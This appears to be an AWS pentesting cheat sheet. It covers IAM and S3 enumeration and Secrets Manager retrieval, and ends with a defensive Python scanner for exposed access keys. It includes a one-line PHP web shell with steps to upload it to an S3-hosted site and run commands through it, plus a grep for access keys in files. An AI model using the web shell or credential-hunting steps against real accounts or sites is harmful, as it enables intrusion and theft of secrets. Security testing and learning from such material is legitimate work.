AWS (Amazon Web Services) Pentesting
Last modified: 2022-11-22
AWS (Amazon Web Services) provides on-demand cloud computing platforms and APIs to individuals, companies, and governments on a metered, pay-as-you-go basis.
Amazon Resource Names (ARNs)
# Format
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
Identity and Access Management (IAM)
# Add credentials
# This adds entries to .aws/config or .aws/credentials in the user's home directory.
# <profile-name> is an arbitrary name you choose.
aws configure --profile <profile-name>
# List credentials
aws configure list --profile <profile-name>
# Find the account id belonging to an access key (access key starts with "AKIA")
aws sts get-access-key-info --access-key-id AKIAQ31B...
# Determine the user the access key you're using belongs to
aws sts get-caller-identity --profile <profile-name>
# List all EC2 instances running in an account
aws ec2 describe-instances --output text --profile <profile-name>
# List all EC2 instances running in an account in a different region
aws ec2 describe-instances --output text --region us-east-1 --profile <profile-name>
Amazon S3
A public cloud storage resource available in Amazon Web Services (AWS) Simple Storage Service (S3), an object storage offering.
S3 Bucket URLs Commonly Used
If you find images on the target website, open each image in a new tab and check whether its URL points to Amazon S3.
The following URL templates are often used:
http://example-assets.s3.amazonaws.com
http://s3.amazonaws.com/example-assets/
http://example-www.s3.amazonaws.com
http://s3.amazonaws.com/example-www/
http://example-public.s3.amazonaws.com
http://s3.amazonaws.com/example-public/
http://example-private.s3.amazonaws.com
http://s3.amazonaws.com/example-private/
http://example-bucket-zero.s3.amazonaws.com
http://s3.amazonaws.com/example-bucket-zero/
http://example-bucket-one.s3.amazonaws.com
http://s3.amazonaws.com/example-bucket-one/
http://example-bucket-two.s3.amazonaws.com
http://s3.amazonaws.com/example-bucket-two/
XML Content Discovery
When you access the S3 bucket URL and the response is an XML listing of the bucket contents, for example:
... <Contents> <Key>creds.txt</Key> ...
retrieve the object by requesting a URL such as https://vulnerable-assets.s3.amazonaws.com/creds.txt.
AWS CLI
First off, you may need to configure the AWS CLI.
aws configure
# http://<bucket-name>.s3.amazonaws.com
# List contents of a bucket
aws s3 ls s3://<bucket-name>/
aws s3 ls s3://<bucket-name>/ --no-sign-request
aws s3 ls s3://example.com
# Specify the endpoint
aws s3 --endpoint-url=http://example.com ls s3://example.com
# Download files from S3
aws s3 cp s3://<bucket-name>/example.xml .
# Upload files to S3
aws s3 cp ./example.txt s3://<bucket-name>
# --------------------------------------------------------------
# List all S3 buckets in the AWS account you've added.
aws s3 ls --profile PROFILENAME
Web Shell/Reverse Shell with CLI
Prepare Web Shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Upload the Web Shell
aws s3 cp ./shell.php s3://example.com
# or
aws s3 --endpoint-url=http://s3.example.com cp ./shell.php s3://example.com
Check that it was uploaded
aws s3 ls s3://example.com
# or
aws s3 --endpoint-url=http://s3.example.com ls s3://example.com
Execute Commands via Request
Send a request to http://example.com/shell.php?cmd=whoami in a browser or with curl.
Secrets Manager
# List secrets
aws secretsmanager list-secrets --profile <profile-name>
# Get secret value
# <secret-id> is the "Name" field of an entry in the SecretList output of 'list-secrets'.
aws secretsmanager get-secret-value --secret-id <secret-id> --profile <profile-name>
# Help
aws secretsmanager help
Get Access Keys From Files
# Access key IDs start with "AKIA"
grep -e AKIA ./*
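As an added example that is not part of the original page, the following Python makes the grep above precise enough to use as a secret-scanning check over your own files or a repository before they are published: it matches the full 20-character key ID format (the AKIA prefix of long-term keys and the ASIA prefix of temporary STS keys), reports file and line, and masks the value in its output. The sample files and key IDs are constructed placeholders.

```python
import re
from typing import Dict, List, Tuple

# Long-term IAM user access key IDs start with "AKIA" and temporary STS
# credentials with "ASIA"; both are 20 characters (4-char prefix + 16
# upper-case alphanumerics). The word boundaries stop a bare "AKIA"
# inside a longer word from matching, which plain `grep -e AKIA` would flag.
ACCESS_KEY_ID_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")


def find_access_key_ids(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, key_id) for every access key ID found in text."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in ACCESS_KEY_ID_RE.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan a mapping of path -> contents; only paths with findings are returned."""
    findings: Dict[str, List[Tuple[int, str]]] = {}
    for path, content in files.items():
        hits = find_access_key_ids(content)
        if hits:
            findings[path] = hits
    return findings


def mask_key_id(key_id: str) -> str:
    """Keep the prefix and last 4 characters so a report does not re-leak the key."""
    return key_id[:4] + "*" * (len(key_id) - 8) + key_id[-4:]


# Constructed sample files; the key IDs are made-up placeholders, not real credentials.
SAMPLE_FILES = {
    "config.ini": "[default]\naws_access_key_id = AKIAEXAMPLEKEY000001\n"
                  "aws_secret_access_key = <redacted>\n",
    "notes.txt": "BAKIA is a word, not a key, and neither is HAKIAAAAAAAAAAAAAAAAA.\n",
    "deploy.log": "exported AWS_ACCESS_KEY_ID=ASIATEMPKEY0000000AB for the job\n",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for lineno, key_id in hits:
            print(f"{path}:{lineno}: possible AWS access key ID {mask_key_id(key_id)}")
```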